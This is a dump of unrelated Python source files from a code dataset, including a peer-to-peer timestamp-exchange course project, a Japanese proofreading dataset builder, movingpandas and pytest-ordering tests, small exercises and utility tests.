sh_file.write('#BSUB -q '+queue+'\\n')\n sh_file.write('#BSUB -J '+job_ref+'\\n')\n sh_file.write('#BSUB -R \"rusage[mem='+str(reserved_memory)+'G]\"'+'\\n')\n sh_file.write('#BSUB -M '+str(maximum_memory)+'GB'+'\\n')\n sh_file.write('#BSUB -o ' + experiment_path+'/logs/PDF_Apply_'+job_ref+'.o\\n')\n sh_file.write('#BSUB -e ' + experiment_path+'/logs/PDF_Apply_'+job_ref+'.e\\n')\n\n this_file_path = os.path.dirname(os.path.realpath(__file__))\n sh_file.write('python ' + this_file_path + '/PDF_ReportApplyJob.py ' + experiment_path +' '+rep_data_path+' '+data_path+ '\\n')\n sh_file.close()\n os.system('bsub < ' + job_name)\n pass\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n","sub_path":"PDF_ReportApplyMain.py","file_name":"PDF_ReportApplyMain.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"506520517","text":"\nimport unicodedata\nfrom proofreading_tokenizer import SC_tokenizer\n\nMODEL_NAME = 'cl-tohoku/bert-base-japanese-whole-word-masking'\n\ndef create_dataset(data_df):\n\n\ttokenizer = SC_tokenizer.from_pretrained(MODEL_NAME)\n\n\tdef check_token_count(row):\n\t\t'''\n\t\t誤変換の文章と正しい文章でトークンに対応がつくかどうかを判定\n\t\t条件:(トークン数が同じ・異なるトークンが2個以内)\n\t\t'''\n\n\t\twrong_text_tokens = tokenizer.tokenize(row['wrong_text'])\n\t\tcorrect_text_tokens = tokenizer.tokenize(row['correct_text'])\n\t\tif len(wrong_text_tokens) != len(correct_text_tokens):\n\t\t\treturn False\n\n\t\t\tdiff_count = 0\n\t\t\tthreshold_count = 2\n\t\t\tfor wrong_text_token, correct_text_token in zip(wrong_text_tokens, correct_text_tokens):\n\t\t\t\tif wrong_text_token != correct_text_token:\n\t\t\t\t\tdiff_count += 1\n\t\t\t\t\tif diff_count > threshold_count:\n\t\t\t\t\t\treturn False\n\n\t\treturn True\n\n\tdef normalize(text):\n\t\t'''\n\t\t文字列の正規化\n\t\t'''\n\t\ttext = text.strip()\n\t\ttext = unicodedata.normalize('NFKC', text)\n\t\treturn text\n\n\t# 漢字の誤変換データのみ抜き出す\n\tcategory_type = 'kanji-conversion'\n\tdata_df.query('category == @category_type', inplace=True)\n\tdata_df.rename(columns={'pre_text': 'wrong_text', 'post_text': 'correct_text'}, inplace=True)\n\tdata_df['wrong_text'] = data_df['wrong_text'].map(normalize) \n\tdata_df['correct_text'] = data_df['correct_text'].map(normalize)\n\tkanji_conversion_num = len(data_df)\n\tdata_df = data_df[data_df.apply(check_token_count, axis=1)]\n\tsame_tokens_count_num = len(data_df)\n\tprint(\n\t f'- 漢字誤変換の総数:{kanji_conversion_num}',\n\t f'- トークンの対応関係のつく文章の総数: {same_tokens_count_num}',\n\t f' (全体の{same_tokens_count_num/kanji_conversion_num*100:.0f}%)',\n\t sep = '\\n'\n\t)\n\treturn data_df[['wrong_text', 'correct_text']].to_dict(orient='records')","sub_path":"ProofReading/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"586564729","text":"def desconto(x, y):\n descontim = (x * y) / 100\n total = x - descontim\n print(f'\\nO valor com {y}% de desconto é {total}')\n \nprint('Inicio')\n\nvalor = float(input('\\nDigite o valor do produto: '))\nporcentagem = int(input('\\nDigite o desconto a ser dado: '))\n\n#função desconto\ndesconto(valor, porcentagem)\n\nprint('\\nFim')\n","sub_path":"Aula 15/Exercícios/B Ex 05.py","file_name":"B Ex 05.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"317789242","text":"\"\"\" /////////////////////////////////////////////////////////\n Simple Delay Sync Service (SDSS)\n ///////////////////////////////////////////////////////// \"\"\"\n\n\"\"\" Coode skeleton was provided by Computer Networks Course Teaching Assistants \"\"\"\n\"\"\" This project is a mini introduction to peer-to-peer networking. \"\"\"\n\n######################################\n#### Imports ###\n######################################\nimport sys\nimport os\nimport threading\nimport socket\nimport datetime\nfrom datetime import timezone\nimport time\nimport uuid\nimport struct\n\n\n# https://bluesock.org/~willkg/dev/ansi.html\nANSI_RESET = \"\\u001B[0m\"\nANSI_RED = \"\\u001B[31m\"\nANSI_GREEN = \"\\u001B[32m\"\nANSI_YELLOW = \"\\u001B[33m\"\nANSI_BLUE = \"\\u001B[34m\"\n\n_NODE_UUID = str(uuid.uuid4())[:8]\n\n\ndef print_yellow(msg):\n print(f\"{ANSI_YELLOW}{msg}{ANSI_RESET}\")\n\n\ndef print_blue(msg):\n print(f\"{ANSI_BLUE}{msg}{ANSI_RESET}\")\n\n\ndef print_red(msg):\n print(f\"{ANSI_RED}{msg}{ANSI_RESET}\")\n\n\ndef print_green(msg):\n print(f\"{ANSI_GREEN}{msg}{ANSI_RESET}\")\n\n\ndef get_broadcast_port():\n return 35498\n\n\ndef get_node_uuid():\n return _NODE_UUID\n\n\nclass NeighborInfo(object):\n def __init__(self, delay, last_timestamp, broadcast_count, ip=None, tcp_port=None):\n # Ip and port are optional, if you want to store them.\n self.delay = delay\n self.last_timestamp = last_timestamp\n self.broadcast_count = broadcast_count\n self.ip = ip\n self.tcp_port = tcp_port\n\n\n############################################\n####### Y O U R C O D E ########\n############################################\n\"\"\" /////////////////////\n Global Variables\n ///////////////////// \"\"\"\nport = 0\nNewPort = 0\nnode_uuid = 0\n\n# Don't change any variable's name.\n# Use this hashmap to store the information of your neighbor nodes.\nneighbor_information = {}\n# Leave the server socket as global variable.\n\n# Server TCP\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(('127.0.0.1',0)) \nserver.listen()\n\n# Broadcaster UDP\nbroadcaster= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nbroadcaster.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nbroadcaster.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nbroadcaster.settimeout(4)\n\n\n# Send the broadcast Message Function\ndef send_broadcast_thread(port_number):\n global broadcaster\n global node_uuid\n node_uuid = get_node_uuid()\n \n while True:\n Message = str(node_uuid) + \" ON \" + str(port_number)\n Message_V2 = Message.encode(\"utf-8\")\n broadcaster.sendto(Message_V2, ('255.255.255.255', get_broadcast_port()))\n print_yellow(\"Broadcast Message is sent\")\n time.sleep(1) # Leave as is.\n pass\n\n\n# Chef If Node Recieve Itself Function\ndef checkIfsameNode (message):\n global node_uuid \n global neighbor_information\n if (node_uuid != message[0] and neighbor_information.get(message[0]) == None):\n #print_green(\"Added Successfully\") \n return 1\n elif (node_uuid != message[0] and neighbor_information.get(message[0]) != None):\n return 2\n else: \n #print_red(\"Ignored\") \n return 0\n\n\n# Receive the broadcast Message Function\ndef receive_broadcast_thread():\n \"\"\"\n Receive broadcasts from other nodes,\n launches a thread to connect to new nodes\n and exchange timestamps.\n \"\"\"\n global neighbor_information\n client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client.bind(('', get_broadcast_port()))\n\n while True:\n data, (ip, port) = client.recvfrom(4096)\n data_v2 = data.decode(\"utf-8\")\n parsed = data_v2.split(\" \")\n print(parsed)\n newnodeflag=checkIfsameNode(parsed)\n\n if(newnodeflag == 1):\n tcpClient=daemon_thread_builder(exchange_timestamps_thread,args=(parsed[0],\"127.0.0.1\",parsed[2],))\n tcpClient.start() \n tcpClient.join()\n elif(newnodeflag == 2):\n x = neighbor_information.get(parsed[0])\n neighbor_information.update({parsed[0]:NeighborInfo(x.delay,x.last_timestamp,x.broadcast_count+1)})\n if (x.broadcast_count == 9): \n neighbor_information.pop(parsed[0])\n\n print_blue(f\"RECV: {data} FROM: {ip}:{port}\")\n \n \n# TCP Server Thread Function \ndef tcp_server_thread(id, tcpPort):\n \"\"\"\n Accept connections from other nodes and send them\n this node's timestamp once they connect.\n \"\"\"\n global server\n \n # TCP Connection\n conn,adrr = server.accept()\n received_time_stamp = struct.unpack('!f', conn.recv(4096))[0]\n \n exchange = daemon_thread_builder(CalcDelay, args=(received_time_stamp, id,tcpPort ))\n exchange.start()\n exchange.join()\n\n pass\n\n\n# Exchange Timestamp Between Two Nodes Function\ndef exchange_timestamps_thread(other_uuid: str, other_ip: str, other_tcp_port: int):\n \"\"\"\n Open a connection to the other_ip, other_tcp_port\n and do the steps to exchange timestamps.\n\n Then update the neighbor_info map using other node's UUID.\n \"\"\"\n tcpserver=daemon_thread_builder(tcp_server_thread, args=(other_uuid, other_tcp_port))\n\n SENDER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n SENDER.connect((other_ip,int(other_tcp_port)))\n address = (other_ip, int(other_tcp_port))\n time_now = datetime.datetime.now().replace(tzinfo=timezone.utc).timestamp()\n SENDER.sendto(struct.pack('!f', time_now), address)\n \n tcpserver.start()\n tcpserver.join()\n SENDER.close()\n\n pass\n\n\n# Calculate Delay Function\ndef CalcDelay(sentTime, id, tcpPort):\n if(sentTime != \"\"): # Only calculate delay when there is a value received for timestamp\n Now = datetime.datetime.now().replace(tzinfo=timezone.utc).timestamp()\n Delay = abs(Now - sentTime)\n print_red(f\"Delay From Device => [ {id} ] is => {str(Delay)}ms\")\n x = NeighborInfo(Delay,Now,1)\n neighbor_information.update({id: x}) # Add New Neighbor\n pass\n \n\n# Create Threads Function\ndef daemon_thread_builder(target, args=()) -> threading.Thread:\n \"\"\"\n Use this function to make threads. Leave as is.\n \"\"\"\n th = threading.Thread(target=target, args=args)\n th.setDaemon(True)\n return th\n\n\n# Start Sending and Receiving Broadcast Message\ndef entrypoint():\n # Send Broadcast\n global server\n port=server.getsockname()[1]\n \n # Receive Broadcast\n receiver=daemon_thread_builder(receive_broadcast_thread)\n sender=daemon_thread_builder(send_broadcast_thread,args=(port,))\n \n sender.start()\n receiver.start()\n\n sender.join()\n receiver.join()\n\n pass\n\n \n############################################\n############################################\n\n\ndef main():\n \"\"\"\n Leave as is.\n \"\"\"\n print(\"*\" * 50)\n print_red(\"To terminate this program use: CTRL+C\")\n print_red(\"If the program blocks/throws, you have to terminate it manually.\")\n print_green(f\"NODE UUID: {get_node_uuid()}\")\n print(\"*\" * 50)\n time.sleep(2) # Wait a little bit.\n entrypoint()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"SDSS.py","file_name":"SDSS.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"378730636","text":"# This file contains the definition of the Pet class and associated methods.\n\nclass Pet(object):\n \"\"\"Represents a pet.\n \n An instance of this class contains the data to describe a pet: Its age, its\n sadness, its value, what types of food it can eat, and its needs. It also\n contains methods which grow it, check if it dies or changes dimension,\n etc., return a list of cards a player must draw. \"\"\"\n\n def __init__(self, name, needs_list, diet, age=2):\n \"\"\"Initialize the pet.\n \n Expects a string name, a list of needs, full-length and in order with\n respect to the age of the pet. Diet should be a string - omnivore,\n carnivore, or herbivore. Age should be an integer between 2 and the\n length of the needs & price lists. Defaults to age 2 if age is omitted.\n Defaults to standard pricing and aging, but if these are set to other\n values nothing should break.\"\"\"\n \n # Default pricing based on pet diet.\n carnivore_pricing = [0,0,0,3,4,5,6]\n herbivore_pricing = [0,0,0,2,3,4,5]\n omnivore_pricing = [0,0,0,1,2,3,4]\n \n # Default pet aging.\n self.aging_chart = [0,0,2,2,1,1,1,0]\n\n # Assign basic attributes.\n self.name = name\n self.needs_list = needs_list\n self.age = age\n self.misery = 0\n self.mutations = 0\n\n # Create a diet dictionary.\n diet_cases = {\n 'Omnivore': [True, True, omnivore_pricing],\n 'Carnivore': [True, False, carnivore_pricing],\n 'Herbivore': [False, True, herbivore_pricing],\n }\n\n # Set carnivore and herbivore flags.\n [self.carnivore, self.herbivore] = diet_cases.get(diet)[:2]\n\n # Set pricing based on diet defaults. Gets the last dictionary item\n self.pricing_chart = diet_cases.get(diet)[-1]\n\n def growUp(self, i=None):\n \"\"\"Age the pet according to its growth chart or the passed argument.\n \n If no arguments are given, ages the pet according to its growth chart.\n If an argument is given, ages the pet that many steps instead.\"\"\"\n\n if i == None:\n i = self.aging_chart[self.age]\n \n self.age += i\n\n def currentNeeds(self):\n \"\"\"Return a list of card types this pet needs based on its age.\"\"\"\n \n return self.needs_list[:self.age]\n\n def checkStatus(self):\n \"\"\"Check if the pet dies due to mutation or misery.\"\"\"\n goes_away = False\n\n if self.mutations > 1:\n goes_away = True\n \n if self.misery > self.age:\n goes_away = True\n \n return goes_away\n\n","sub_path":"pets.py","file_name":"pets.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307887140","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nimport pandas as pd\nfrom geopandas import GeoDataFrame\nfrom shapely.geometry import Point\nfrom datetime import datetime\nfrom movingpandas.trajectory_collection import TrajectoryCollection\n\n\nclass TestTrajectoryCollection:\n\n def setup_method(self):\n df = pd.DataFrame([\n {'id': 1, 'obj': 'A', 'geometry': Point(0, 0), 't': datetime(2018,1,1,12,0,0), 'val': 9},\n {'id': 1, 'obj': 'A', 'geometry': Point(6, 0), 't': datetime(2018,1,1,12,6,0), 'val': 5},\n {'id': 1, 'obj': 'A', 'geometry': Point(6, 6), 't': datetime(2018,1,1,12,10,0), 'val': 2},\n {'id': 1, 'obj': 'A', 'geometry': Point(9, 9), 't': datetime(2018,1,1,12,15,0), 'val': 4},\n {'id': 2, 'obj': 'A', 'geometry': Point(10, 10), 't': datetime(2018,1,1,12,0,0), 'val': 10},\n {'id': 2, 'obj': 'A', 'geometry': Point(16, 10), 't': datetime(2018,1,1,12,6,0), 'val': 6},\n {'id': 2, 'obj': 'A', 'geometry': Point(16, 16), 't': datetime(2018,1,2,12,10,0), 'val': 7},\n {'id': 2, 'obj': 'A', 'geometry': Point(190, 19), 't': datetime(2018,1,2,12,15,0), 'val': 3}\n ]).set_index('t')\n self.geo_df = GeoDataFrame(df, crs={'init': '31256'})\n\n def test_number_of_trajectories(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert len(collection) == 2\n\n def test_number_of_trajectories_min_length(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj', min_length=100)\n assert len(collection) == 1\n\n def test_number_of_trajectories_min_length_never_reached(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj', min_length=1000)\n assert len(collection) == 0\n\n def test_split_by_date(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n collection = collection.split_by_date(mode='day')\n assert len(collection) == 3\n\n def test_get_trajectory(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert collection.get_trajectory(1).id == 1\n assert collection.get_trajectory(1).obj_id == 'A'\n assert collection.get_trajectory(2).id == 2\n assert collection.get_trajectory(3) is None\n\n def test_filter(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert len(collection.filter('obj', 'A')) == 2\n assert len(collection.filter('obj', 'B')) == 0\n\n def test_get_min_and_max(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert collection.get_min('val') == 2\n assert collection.get_max('val') == 10\n\n def test_get_start_locations(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n locs = collection.get_start_locations(columns=['val'])\n assert len(locs) == 2\n assert locs.iloc[0].geometry in [Point(0, 0), Point(10, 10)]\n assert locs.iloc[0].traj_id in [1, 2]\n assert locs.iloc[0].obj_id == 'A'\n assert locs.iloc[0].val in [9, 10]\n assert locs.iloc[1].geometry in [Point(0, 0), Point(10, 10)]\n\n","sub_path":"movingpandas/tests/test_trajectory_collection.py","file_name":"test_trajectory_collection.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"149783961","text":"### Normalize the data matrix and add labels\r\n\r\nfrom sklearn import preprocessing\r\n\r\n#x = df.values[:,1:14] #returns a numpy array\r\n#x = df.values\r\n#min_max_scaler = preprocessing.MinMaxScaler()\r\n#x_scaled = min_max_scaler.fit_transform(x)\r\n#df_normalize = pd.DataFrame(x_scaled)\r\n#\r\n##print(df.head(n=10))\r\n#df_normalize['score_all'] = score_all\r\n\r\n#\r\nx2 = df2.values\r\nmin_max_scaler2 = preprocessing.MinMaxScaler()\r\nx_scaled2 = min_max_scaler2.fit_transform(x2)\r\ndf2_normalize = pd.DataFrame(x_scaled2)\r\n\r\n#print(df.head(n=10))\r\n#df2_normalize['score_all'] = score_all","sub_path":"normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"310184176","text":"import unittest\nfrom typing import *\n\nimport pandas as pd\n\nfrom pysimple.utils import flatten_iter, df2dict, split_list\n\n\nclass FlattenIterTestCase(unittest.TestCase):\n \"\"\"Test utils.flatten_iter() function\"\"\"\n\n def test_output_is_iterator(self):\n \"\"\"Test if flatten_iter() returns iterator\"\"\"\n outp = flatten_iter([[1, 2]])\n self.assertTrue(isinstance(outp, Iterable))\n\n def test_output_is_valid(self):\n \"\"\"Test if flatten_iter() returns expected output\"\"\"\n inp = [[1, 2], [3, 4]]\n expected = [1, 2, 3, 4]\n actual = list(flatten_iter(inp))\n self.assertEqual(expected, actual)\n\n def test_iter_input(self):\n \"\"\"Test if flatten_iter() works with iterators as input\"\"\"\n inp = [range(1, 3), range(3, 5)]\n expected = set(range(1, 5))\n actual = set(flatten_iter(inp))\n self.assertEqual(expected, actual)\n\n def test_empty_input(self):\n \"\"\"Test if flatten_iter() works with empty list as input\"\"\"\n inp = []\n expected = []\n actual = list(flatten_iter(inp))\n self.assertEqual(expected, actual)\n\n\nclass Df2DictTestCase(unittest.TestCase):\n \"\"\"Test utils.df2dict() function\"\"\"\n\n def test_output_is_valid(self):\n \"\"\"Test if df2dict() returns expected output\"\"\"\n expected = [{'a': 1, 'b': 2}, {'a': 2, 'b': 3}]\n inp = pd.DataFrame(expected)\n actual = df2dict(inp)\n self.assertEqual(expected, actual)\n\n def test_empty_input(self):\n \"\"\"Test if df2dict() works with empty DataFrame as input\"\"\"\n expected = []\n inp = pd.DataFrame([])\n actual = df2dict(inp)\n self.assertEqual(expected, actual)\n\n\nclass SplitListTestCase(unittest.TestCase):\n \"\"\"Test utils.split_list() function\"\"\"\n\n def test_output_is_iterator(self):\n \"\"\"Test if split_list() returns iterator\"\"\"\n outp = split_list([1, 2, 3], split_size=1)\n self.assertTrue(isinstance(outp, Iterable))\n\n def test_splits_arg(self):\n \"\"\"Test if split_list() returns expected output for splits arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n # Split positions\n splits = [0, 2, 4]\n expected = [[], [1, 2], [3, 4], [5]]\n actual = list(split_list(items=inp, splits=splits))\n self.assertEqual(expected, actual)\n\n def test_empty_splits_arg(self):\n \"\"\"Test if split_list() works with empty splits arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n expected = [inp]\n actual = list(split_list(items=inp, splits=[]))\n self.assertEqual(expected, actual)\n\n def test_n_splits_arg(self):\n \"\"\"Test if split_list() returns expected output for n_splits arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n\n expected = [[1, 2, 3, 4, 5]]\n actual = list(split_list(items=inp, n_splits=1))\n self.assertEqual(expected, actual)\n\n expected = [[1, 2, 3], [4, 5]]\n actual = list(split_list(items=inp, n_splits=2))\n self.assertEqual(expected, actual)\n\n expected = [[1, 2], [3, 4], [5]]\n actual = list(split_list(items=inp, n_splits=3))\n self.assertEqual(expected, actual)\n\n inp = list(range(100))\n for n_splits in range(1, 10):\n # Check that there are exactly n splits\n actual = list(split_list(items=inp, n_splits=n_splits))\n self.assertEqual(n_splits, len(actual))\n # Check that splits are of expected equal size\n expected_size = len(actual[0])\n for split in actual[1:-1]:\n self.assertEqual(expected_size, len(split))\n\n def test_zero_n_splits_arg(self):\n \"\"\"Test if split_list() returns expected output for n_splits=0\"\"\"\n inp = [1, 2, 3, 4, 5]\n expected = [[1, 2, 3, 4, 5]]\n actual = list(split_list(items=inp, n_splits=1))\n self.assertEqual(expected, actual)\n\n def test_split_size_arg(self):\n \"\"\"Test if split_list() returns expected output for split_size arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n expected = [[1, 2], [3, 4], [5]]\n actual = list(split_list(items=inp, split_size=2))\n self.assertEqual(expected, actual)\n\n inp = list(range(100))\n for split_size in range(1, 10):\n # Check that each split is of expected size\n actual = list(split_list(items=inp, split_size=split_size))\n for split in actual[:-1]:\n self.assertEqual(split_size, len(split))\n\n def test_empty_input(self):\n \"\"\"Test if split_list() works with empty list as input\"\"\"\n expected = [[]]\n actual = list(split_list(items=[], n_splits=10))\n self.assertEqual(expected, actual)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"561896906","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'virtual'\n\nfrom schema import *\nfrom .persons import Persons\n\n\nclass PersonInfos(Base):\n __tablename__ = 'person_infos'\n\n __table_args__ = {'extend_existing': True, 'schema':'core', }\n\n id = Column(Integer, primary_key=True)\n first_name = Column(String)\n second_name = Column(String)\n last_name = Column(String)\n person_id = Column(Integer, ForeignKey(\"core.persons.id\"))\n #service_type = Column(Integer)\n #service_sub_type = Column(Integer)\n\n person = relation(Persons, primaryjoin=(person_id == Persons.id), backref='info')\n\n def __repr__(self):\n return (\"[%d] %s %s %s\" % (self.id, self.first_name, self.second_name, self.last_name, )).encode('utf-8')\n","sub_path":"addons/onyma/schema/smart/core/person_infos.py","file_name":"person_infos.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"568865830","text":"import os\nfrom email.generator import Generator\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n\nclass EmailTemplate:\n def __init__(self, records):\n self.records = records\n self.generate()\n\n def generate(self):\n html = \"\"\"\n \n \n \n

hello world

\n \n \n \"\"\"\n part = MIMEText(html, 'html')\n\n msg = MIMEMultipart('alternative')\n # msg['Subject'] = ''\n # msg['From'] = ''\n # msg['To'] = ''\n msg.attach(part)\n\n cwd = os.getcwd()\n file = os.path.join(cwd, 'message.eml')\n\n with open(file, 'w') as f:\n gen = Generator(f)\n gen.flatten(msg)\n","sub_path":"template_generator.py","file_name":"template_generator.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"181246831","text":"import re\n\nimport pytest\n\nimport pytest_ordering\nfrom . import numbers, words, words_backwards, grouping, marked_classes\n\n\n@pytest.mark.parametrize('module', [\n numbers, words, words_backwards, grouping, marked_classes\n])\ndef test_ordered_tests(module, testdir):\n items = testdir.getitems(module)\n ordered_tests = list(pytest_ordering._order_tests(items))\n ordered_letters = [item.name[-1] for item in ordered_tests]\n assert ordered_letters == list(module.ordering)\n\n\ndef test_run_marker_registered(capsys):\n pytest.main('--markers')\n out, err = capsys.readouterr()\n assert '@pytest.mark.run' in out\n\n\ndef test_version():\n assert hasattr(pytest_ordering, '__version__')\n assert re.match(r'[0-9]+\\.[0-9]+(\\.[0-9]+)?$', pytest_ordering.__version__)\n","sub_path":"tests/test_ordering.py","file_name":"test_ordering.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"151253252","text":"#!/usr/bin/env python3\nimport json\nimport os\nimport shutil\nfrom urllib.parse import quote_plus\n\nfrom fedoidc import test_utils\n\nimport fo_conf\n\nKEYDEFS = [\n {\"type\": \"RSA\", \"key\": '', \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]}\n]\n\nTOOL_ISS = 'https://localhost'\n\n# Clear out old stuff\nfor d in ['mds', 'ms']:\n if os.path.isdir(d):\n shutil.rmtree(d)\n\nliss = list(fo_conf.FO.values())\nliss.extend(list(fo_conf.OA.values()))\n\nsigners, keybundle = test_utils.setup(\n KEYDEFS, TOOL_ISS, liss, ms_path=fo_conf.MS_PATH, csms_def=fo_conf.SMS_DEF,\n mds_dir=fo_conf.MDS_DIR, base_url=fo_conf.BASE_URL)\n\nexp = 'jwks_bundle'\nif not os.path.isdir(exp):\n os.mkdir(exp)\nos.chdir(exp)\nfor iss, kj in keybundle.items():\n fn = quote_plus(iss)\n fp = open(fn, 'w')\n fp.write(json.dumps(kj.export_jwks(issuer=iss)))\n fp.close()\nos.rmdir('fo_jwks')\nos.chdir('..')","sub_path":"example/fed_setup.py","file_name":"fed_setup.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"27971762","text":"from queue import PriorityQueue\n\ndef solve():\n arr = list(map(int,input().split()))\n ans = 0\n pq = PriorityQueue()\n\n for i in arr:\n pq.put(i)\n\n while pq.qsize()>1:\n s = pq.get() + pq.get()\n ans+=s\n pq.put(s)\n\n print(ans)\n\nif __name__ == '__main__':\n solve()","sub_path":"DsAlgo/BuffToTest/NoiThanhKimLoai.py","file_name":"NoiThanhKimLoai.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"94811655","text":"\"\"\"\nTests for nuke_filewalker.FileIndexer\n\"\"\"\n\nimport unittest\n\nfrom nukefilewalker.indexer import FileIndexer\n\n\nclass IndexerTestCase(unittest.TestCase):\n \"\"\"\n Tests for nuke_filewalker.FileIndexer\n \"\"\"\n def setUp(self):\n self.indexer = FileIndexer(['tests/testfile1.txt', 'tests/testfile2.txt'])\n\n def test_tokenize(self):\n \"\"\"\n FileIndexer.tokenize should tokenize a blob of text into words.\n \"\"\"\n with open('tests/testfile1.txt') as fp:\n blob = fp.read()\n self.assertEqual(self.indexer.tokenize(blob), [\n 'i', 'am', 'beginning', 'to', 'feel', 'like', 'a', 'rap',\n 'god', 'rap', 'god', 'all', 'my', 'people', 'from', 'the',\n 'front', 'to', 'the', 'back', 'nod', 'back', 'nod', 'now',\n 'who', 'thinks', 'their', 'arms', 'are', 'long', 'enough',\n 'to', 'slap', 'box', 'slap', 'box', 'they', 'said', 'i',\n 'rap', 'like', 'a', 'robot', 'so', 'call', 'me', 'rap', 'bot'\n ])\n\n def test_start_indexing(self):\n \"\"\"\n FileIndexer.start_indexing should index multiple files and store all\n the words in a list.\n \"\"\"\n self.indexer.start_indexing()\n self.assertEqual(self.indexer.words, [\n 'i', 'am', 'beginning', 'to', 'feel', 'like', 'a', 'rap',\n 'god', 'rap', 'god', 'all', 'my', 'people', 'from', 'the',\n 'front', 'to', 'the', 'back', 'nod', 'back', 'nod', 'now',\n 'who', 'thinks', 'their', 'arms', 'are', 'long', 'enough',\n 'to', 'slap', 'box', 'slap', 'box', 'they', 'said', 'i',\n 'rap', 'like', 'a', 'robot', 'so', 'call', 'me', 'rap', 'bot',\n 'i', 'am', 'a', 'space', 'bound', 'rocket', 'ship', 'and',\n 'your', 'heart', 'is', 'the', 'moon', 'and', 'i', 'am', 'aiming',\n 'right', 'at', 'you', 'right', 'at', 'you', 'two', 'hundred',\n 'fifty', 'thousand', 'miles', 'on', 'a', 'clear', 'night', 'in',\n 'june', 'and', 'i', 'am', 'aiming', 'right', 'at', 'you',\n 'right', 'at', 'you', 'right', 'at', 'you'\n ])\n\n def test_most_encountered_words_default_count(self):\n \"\"\"\n FileIndexer.most_encountered_words called without a parameter\n should return the top 10 most common words across all the files\n being indexed.\n \"\"\"\n self.indexer.start_indexing()\n self.assertEqual(self.indexer.most_encountered_words(), [\n ('right', 5), ('you', 5), ('i', 5), ('at', 5), ('am', 4),\n ('rap', 4), ('a', 4), ('and', 3), ('to', 3), ('the', 3),\n ])\n\n def test_most_encountered_words_new_count(self):\n \"\"\"\n FileIndexer.most_encountered_words should return the specified\n number of most common words when called with a parameter for\n count.\n \"\"\"\n self.indexer.start_indexing()\n self.assertEqual(self.indexer.most_encountered_words(5), [\n ('right', 5), ('you', 5), ('i', 5), ('at', 5), ('am', 4)\n ])\n\n def test_most_encountered_words_longer_text_blob(self):\n \"\"\"\n Test FileIndexer.most_encountered_words with a longer text blob\n \"\"\"\n indexer = FileIndexer(['tests/a_dark_brown_dog'])\n indexer.start_indexing()\n self.assertEqual(indexer.most_encountered_words(5), [\n ('the', 212), ('a', 88), ('and', 83), ('he', 80),\n ('his', 69)\n ])\n","sub_path":"tests/test_indexer.py","file_name":"test_indexer.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312848610","text":"# coding = utf-8\n\nimport pymysql\nimport configparser\nfrom urllib.parse import quote_plus\nimport pymongo\nimport sys\nimport time\nimport json\n\n\nconf = configparser.ConfigParser()\nconf.read(\"E:\\\\binworks\\\\HEYTEA_TEST\\\\common\\\\myconfig.ini\", 